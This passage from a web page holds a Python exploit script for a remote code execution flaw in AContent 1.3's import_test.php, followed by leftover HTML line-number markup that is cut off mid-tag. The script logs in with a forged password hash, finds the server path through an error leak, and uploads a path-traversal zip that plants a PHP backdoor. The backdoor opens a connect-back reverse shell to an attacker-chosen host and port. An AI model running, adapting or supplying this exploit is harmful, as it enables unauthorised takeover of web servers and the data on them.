threaded_tcp_server(SocketServer.ThreadingMixIn, SocketServer.TCPServer):      pass    def banner():      print &#8220;nt| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- |&#8221;      print &#8220;t| AContent &lt;= 1.3 import_test.php Remote Code Execution Vulnerability |&#8221;      print &#8220;t| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;|n&#8221;    def _get_hashed_password(token):      &#8220;&#8221;&#8221;      takes advantage of the authentication weakness and generates       the hash as the server expects it, see client side code      &#8220;&#8221;&#8221;      s2 = hashlib.sha1()      s1 = hashlib.sha1()      s1.update(password)      hash_stage_1 = s1.hexdigest()      s2.update(&#8220;%s%s&#8221; % (hash_stage_1, token))      return s2.hexdigest()    def _build_php_code():      phpkode  = (&#8220;&#8221;&#8221;      @set_time_limit(0); @ignore_user_abort(1); @ini_set(&#8216;max_execution_time&#8217;,0);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$dis=@ini_get(&#8216;disable_functions&#8217;);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if(!empty($dis)){$dis=preg_replace(&#8216;\/[, ]+\/&#8217;, &#8216;,&#8217;, $dis);$dis=explode(&#8216;,&#8217;, $dis);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$dis=array_map(&#8216;trim&#8217;, $dis);}else{$dis=array();} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if(!function_exists(&#8216;LcNIcoB&#8217;)){function LcNIcoB($c){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;global $dis;if (FALSE !== strpos(strtolower(PHP_OS), &#8216;win&#8217; )) {$c=$c.&#8221; 2&gt;&amp;1\\n&#8221;;} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$imARhD=&#8217;is_callable&#8217;;$kqqI=&#8217;in_array&#8217;;&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if($imARhD(&#8216;popen&#8217;)and!$kqqI(&#8216;popen&#8217;,$dis)){$fp=popen($c,&#8217;r&#8217;);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=NULL;if(is_resource($fp)){while(!feof($fp)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o.=fread($fp,1024);}}@pclose($fp);}else&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if($imARhD(&#8216;proc_open&#8217;)and!$kqqI(&#8216;proc_open&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$handle=proc_open($c,array(array(pipe,&#8217;r&#8217;),array(pipe,&#8217;w&#8217;),array(pipe,&#8217;w&#8217;)),$pipes); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;@proc_close($handle);}else if($imARhD(&#8216;system&#8217;)and!$kqqI(&#8216;system&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;ob_start();system($c);$o=ob_get_contents();ob_end_clean(); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}else if($imARhD(&#8216;passthru&#8217;)and!$kqqI(&#8216;passthru&#8217;,$dis)){ob_start();passthru($c); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=ob_get_contents();ob_end_clean(); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}else if($imARhD(&#8216;shell_exec&#8217;)and!$kqqI(&#8216;shell_exec&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=shell_exec($c);}else if($imARhD(&#8216;exec&#8217;)and!$kqqI(&#8216;exec&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$nofuncs=&#8217;no exec functions&#8217;; &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if(is_callable(&#8216;fsockopen&#8217;)and!in_array(&#8216;fsockopen&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$s=@fsockopen(&#8216;tcp:\/\/%s&#8217;,&#8217;%s&#8217;);while($c=fread($s,2048)){$out = &#8221;; &#8220;&#8221;&#8221; % (cb_host, cb_port))      phpkode += (&#8220;&#8221;&#8221;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}elseif (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;){break;}else{ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;break;}}fwrite($s,$out);}fclose($s);}else{ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,&#8217;%s&#8217;,&#8217;%s&#8217;); &#8220;&#8221;&#8221; % (cb_host, cb_port))      phpkode += (&#8220;&#8221;&#8221;@socket_write($s,&#8221;socket_create&#8221;);while($c=@socket_read($s,2048)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$out = &#8221;;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;} else if (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;) { &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}@socket_close($s);} &#8220;&#8221;&#8221;)      return &#8220;&lt;?php %s ?&gt;&#8221; % phpkode        def we_can_login():      &#8220;&#8221;&#8221;      logs into the target      &#8220;&#8221;&#8221;      print &#8220;(+) getting server token&#8221;      r = s.get(&#8220;http:\/\/%s\/login.php&#8221; % target)      match = re.search(&#8220;) + &#8220;(.*)&#8221;)&#8221;, r.text)      if match:          print &#8220;(+) found the token&#8221;          print &#8220;(+) logging in as %s&#8230;&#8221; % username          data = {&#8216;form_password_hidden&#8217;: _get_hashed_password(match.group(1)), &#8216;form_login&#8217;: username, &#8216;submit&#8217;:&#8217;Login&#8217;}          r = s.post(&#8220;http:\/\/%s\/login.php&#8221; % target, data=data, allow_redirects=False)          if (r.status_code == 302) and (&#8220;index.php&#8221; in r.headers[&#8216;Location&#8217;]):              return True          else:              print &#8220;(-) failed to login, check your student password&#8221;      else:          print &#8220;(-) failed to get the token&#8221;      return False        def _build_zip():      &#8220;&#8221;&#8221;      builds the zip file.      we upload a .htaccess incase the webserver doesnt have       a handler for phtml extensions but typically, they do.      &#8220;&#8221;&#8221;      f = StringIO()      z = zipfile.ZipFile(f, &#8216;w&#8217;, zipfile.ZIP_DEFLATED)      z.writestr(&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/.htaccess&#8217; % fp, &#8220;AddType application\/x-httpd-php .phtml&#8221;)      z.writestr(&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/si.phtml&#8217; % fp, _build_php_code())      z.close()      handle = open(&#8216;pwn.zip&#8217;,&#8217;wb&#8217;)      handle.write(f.getvalue())      handle.close     def we_can_upload_a_shell():      &#8220;&#8221;&#8221;      uploads a zip file with php code inside to our target for exploitation      &#8220;&#8221;&#8221;      _build_zip()      multiple_files = {          &#8216;file&#8217;: (&#8216;pwn.zip&#8217;, open(&#8216;pwn.zip&#8217;,&#8217;rb&#8217;), &#8216;application\/zip&#8217;),          &#8216;submit_import&#8217;: (None, &#8216;Install&#8217;),          &#8216;_course_id&#8217;: (None, &#8216;2&#8217;)         }      proxies = {&#8220;http&#8221;:&#8221;http:\/\/127.0.0.1:8080&#8243;}      r = s.post(&#8220;http:\/\/%s\/tests\/import_test.php&#8221; % target, files=multiple_files, allow_redirects=False, proxies=proxies)            if r.status_code == 302:          return True      return False        def _clean_up():      os.remove(&#8220;pwn.zip&#8221;)    def pop_shell():      &#8220;&#8221;&#8221;      pops a shell by making a request to the backdoor code      &#8220;&#8221;&#8221;      _clean_up()      try:          r = s.get(&#8220;http:\/\/%s\/home\/si.phtml&#8221; % target)      except:          pass    def we_can_get_fp():      &#8220;&#8221;&#8221;      gets the full path      requires some php.ini settings:      display_errors = On      &#8220;&#8221;&#8221;      global fp      r = s.get(&#8220;http:\/\/%s\/documentation\/index.php?p[]=&#8221; % target)      match = re.search(&#8220;array given in &lt;b&gt;\/(.*)documentation\/index.php&lt;\/b&gt; &#8220;, r.text)      if match:          fp = &#8220;\/%s&#8221; % match.group(1)          return True      return False              def validation_of_args_are_good():      &#8220;&#8221;&#8221;      validates where the arguments are good or not      &#8220;&#8221;&#8221;      global target, cb_host, cb_port, username, password, w_lst, help_str      help_str = &#8220;%s &lt;target&gt; &lt;author user:pass&gt; &lt;connectback host:port&gt;&#8221; % sys.argv[0]      if len(sys.argv) &lt; 4:          print help_str          sys.exit(1)      target    = sys.argv[1]      user_pass = sys.argv[2]      host_port = sys.argv[3]      if &#8220;:&#8221; not in host_port:          print &#8220;(-) your connectback host must be in &lt;host:port&gt; format&#8221;          return False      elif &#8220;:&#8221; not in user_pass:          print &#8220;(-) your student username and password must be in &lt;user:pass&gt; format&#8221;          return False      cb_port = host_port.split(&#8220;:&#8221;)[1]      cb_host = host_port.split(&#8220;:&#8221;)[0]      password = user_pass.split(&#8220;:&#8221;)[1]      username = user_pass.split(&#8220;:&#8221;)[0]      if not cb_port.isdigit():          print &#8220;(-) you need a port NUMBER for the command back host&#8221;          return False      elif not os.access(os.getcwd(), os.W_OK):          print &#8220;(-) dont have write access in current dir!&#8221;          return False      return True      def main():        global s      s = requests.Session()      banner()      if validation_of_args_are_good():          if we_can_login():              print &#8220;(+) logged in successfully&#8230;&#8221;              print &#8220;(+) finding full path&#8230;&#8221;              if we_can_get_fp():                  print &#8220;(!) found the path at: %s&#8221; % fp                  print &#8220;(+) uploading shell&#8230;&#8221;                  if we_can_upload_a_shell():                      print &#8220;(!) shell upload successful, launching!&#8221;                      instance = threaded_tcp_server((&#8220;0.0.0.0&#8221;, int(cb_port)), connect_back_shell)                      cbserver = threading.Thread(target=instance.serve_forever)                      cbserver.daemon = True                      cbserver.start()                      pop_shell()      else:          print help_str          sys.exit(-1)            if __name__ == &#8216;__main__&#8217;:      main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-172\">172<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-173\">173<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-174\">174<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-175\">175<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-176\">176<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-177\">177<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-178\">178<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-179\">179<\/div>\n<div 